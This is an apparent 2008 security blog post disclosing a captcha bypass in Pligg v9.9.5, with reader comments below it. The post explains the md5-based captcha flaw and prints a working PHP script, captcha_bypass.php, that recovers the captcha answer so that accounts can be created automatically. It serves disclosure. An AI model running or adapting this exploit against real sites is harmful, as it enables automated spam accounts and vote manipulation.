Pligg v9.9.5 New Captcha Bypass Security Exploit Found

After the hurried and somewhat controversial release of Pligg v9.9.5 to fix some really bad security exploits it has come to light today that a new exploit has been discovered in v9.9.5. The new Pligg v9.9.5 exploit suffers from a captcha bypass due to an implementation issue. The impact is that an attacker can automatically create user accounts for pligg.

Software Affected: Pligg v9.9.5

The latest version of suffers from a captcha bypass due to an implementation issue. The impact is that an attacker can automatically create user accounts for pligg. The creation of new user accounts makes this auto-voter exploit more serious: http://www.rooksecurity.com/blog/?p=19

The catpcha’s answer is generated the same as php-nuke 8.1. This was broken here:

http://www.securityfocus.com/bid/27129/info

This is a more serious attack when combined with my Captcha bypass which allows an attacker to create new user accounts.

Again the captcha is produced using md5, however this is different. The $_SERVER[‘HTTP_USER_AGENT’] and $ts_random can be controlled by the attacker. $sitekey is a static value, and $datekey is known because it is based on time.

Exploit:

The link to the capthca image will look something like this:

http://127.0.0.1/Pligg_Beta_9.9.0/ts_image.php?ts_random=54771854

To obtain the clear text, send that ts_random value to the captcha_bypass.php with the same web browser:

http://127.0.0.1/captcha_bypass.php?ts_random=54771854

captcha_bypass.php:

< ?php
$sitekey=82397834;
$ts_random=$_REQUEST['ts_random'];
$datekey = date(”F j”);
$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));
print substr($rcode, 2, 6);
?>

Thanks to Rook Security blog for the tip off.

If you enjoyed this post, make sure you subscribe to my RSS feed!

Article Details

#

Author: on August 2nd, 2008

Category: Pligg

Tags: , , ,

  1. Kris says:

    Is this exploit present in YADC too?

  2. D Cotton says:

    I’m closing down new registrations until all this is sorted out.

  3. bbrian017 says:

    omg I hate this crap these people should change careers and stop hacking….

    Please can you get a reply notification mod?

  4. Klanjabrik says:

    hi Guys,

    i have plan to use Pligg, but i’m worried about ‘query-sucker’ like WordPress did, does Pligg lighter than WordPress? thanks before.

  1. Pligg sites crashing, getting spammed, and attacked